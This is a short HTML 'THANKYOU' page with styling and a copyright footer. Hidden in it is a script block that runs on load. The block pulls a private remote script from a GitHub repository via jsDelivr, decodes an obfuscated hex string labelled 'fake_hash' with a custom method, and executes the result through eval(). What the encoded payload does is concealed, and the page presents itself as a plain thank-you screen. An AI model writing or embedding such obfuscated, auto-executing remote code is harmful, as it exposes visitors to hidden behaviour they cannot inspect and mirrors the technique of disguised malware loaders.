<!DOCTYPE html>
<html>
<head>
<title>THANKYOU INDEX</title>
<meta name='viewport' content='width=device-width'>
<script src='https://cdn.jsdelivr.net/gh/SPAT-CLOUD/spat-cloud.github.io@main/HarScript/HSDK.Private.Raw.js'></script>
</head>
<style>
    *{margin:0;padding:0;box-sizing:border-box;}
    body{background-color:#000;color:#fff; font-size: medium;}
    #war{
        display:flex;
        align-items: center ;
        justify-content: space-around;
        
        padding:0.5em;
        margin:15% 0 auto;
    }
    .grad_c{
        font-size: 50px;
        font-weight: bold;
        background: linear-gradient(45deg, #1341e8, #e81384,#990b35); 
        -webkit-background-clip: text;
        background-clip: text;
        color: transparent;
    }
    #ftr{
    bottom:0;
    left:0;
    right:0;
    color:#ddd;
    font-size:10px;
    text-align :center ;
    opacity:0.9;
    padding:.3em;
    position:fixed;
}
</style>
<body>
<div id="war">
<h1 class="grad_c">THANKYOU</h1>
</div>

<div id="ftr">copyright &copy; sonpanabtej 2021 - 2025</div>
</body>
<script type='text/javascript'>
(function(){
    try{
        var t=new $_();
        t.run();
          var kkl =["81c442e2412253e2459182546194423494b3f444d433f434b23393b3b5214103f4627344b2156234b554535321a262637591a403d4b2835411734134616142b365b341b2a1a383b3a594e4d265a18324117231a37595e4d241a182b365d4315481d442c27533936484513134153341a36573f4b3"]
        var fake_hash= kkl[0];
        eval(fake_hash.hl());
}catch(e){alert(e);}
})()

</script>
</html>
